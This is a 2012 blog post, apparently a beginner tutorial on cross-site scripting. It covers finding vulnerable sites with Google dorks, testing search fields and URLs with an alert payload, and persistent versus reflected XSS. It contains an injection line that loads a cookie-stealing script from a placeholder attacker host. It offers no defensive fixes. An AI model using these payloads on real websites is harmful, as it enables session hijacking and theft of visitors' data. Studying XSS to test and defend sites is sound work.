Pages

Sunday, June 24, 2012

Cross Site Scripting(XSS) Complete Tutorial for Beginners




What is XSS?
XSS is stands for Cross site Scripting.  Don't confuse this with CSS(Cascading Style sheet).  It is one of the Top Web Application Vulnerability.  This vulnerability allows the attacker to insert client side scripts(especially Javascript) .  Using this vulnerability an attacker can inject malicious codes, leads to malware attack, phishing and session hijacking. 

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website
As usual an attacker will search in google using the google Dork. For example, he will search for "search?q=" or "search.php?q= . This will results plenty of website. There are plenty of Google dork, hackers find their own dork and search.  if you have bad luck, it will be your site. 

Step 2: Testing the Vulnerability
In order to test the vulnerability, we need  to find a POST or Get parameter. Confused ? It is just input fields that will be send to server.  For example search query,username ,password . 
There are two ways to test the vulnerability:

Method 1: injection in form box(especially search box)
An attacker can enter the malcious script inside the search box and click the search button.  This will lead to run the malicious script inside that website


Method 2: Injecting in url
In this method , there may  not any form box.  They use the url field instead.
For Example:

htp://vulnerablewebsite/search?q=malicious_script_goes_here
for testing purpose, insert the
<script>alert('hi');</script> 
in the input fields.

For example:
using method 1, you can enter the code in search box and click the search button.
or
using method 2, you can enter the code in url like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>

if it shows "Hi" message in popup box, then it is vulnerable to XSS.


step 3: Injecting Malicious Scripts
After find vulnerable site, an attacker will inject malicious scripts. It may lead to stealing cookies and malware attack as said before.

Let us assume an attacker has cookie stealing script  in his website.  for instance, his malicious script url is

http://attackerSite/malicious.js
He can inject now the malcious script inside the vulnerable site like this:
<script src=http://attackerSite/malicious.js></script>
When visitors loads into website, the malicious start to run and cause to cookie stealing.

Types of XSS Based on persisting capability:

There are two types of XSS based on persisting Capability namely Persistent and Non-Persistent.

Persistent XSS:
This is risky XSS vulnerability , it stores the data provided in server.  So the malicious script injection is permanently stored in web application.   It will be shown to other users when they visit the site.
if the attacker inject malware , then regular users of that website also infected .

For example:
Some sites may store the search query in order to track the user interest. This results in permanent storage of XSS.

Non-Persistent XSS:
Also referred as Reflected XSS .  In this case, the storage of malicious script is temporary one(means it won't be shown to other users).  Attacker may trick users to visit the URL with injection.  As they are regular user of that site, they will trust the link.  It leads to stealing cookies.

For example:
When you search in some site, it will return the result with your searching string. This cause to run the malicious code temporarily.

What can an attacker do with this Vulnerability?

  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement.
  • Denial of Service attacks(Dos)
Disclaimer:This article is for educational purpose only.  In order to Pentesters/Ethical hackers understand  the web application vulnerability, this article is written.   Also this article will educate webmaster so that they can prevent them self. 


Backlink- http://www.breakthesecurity.com
source: http://www.defencehacker.in

No comments:

Post a Comment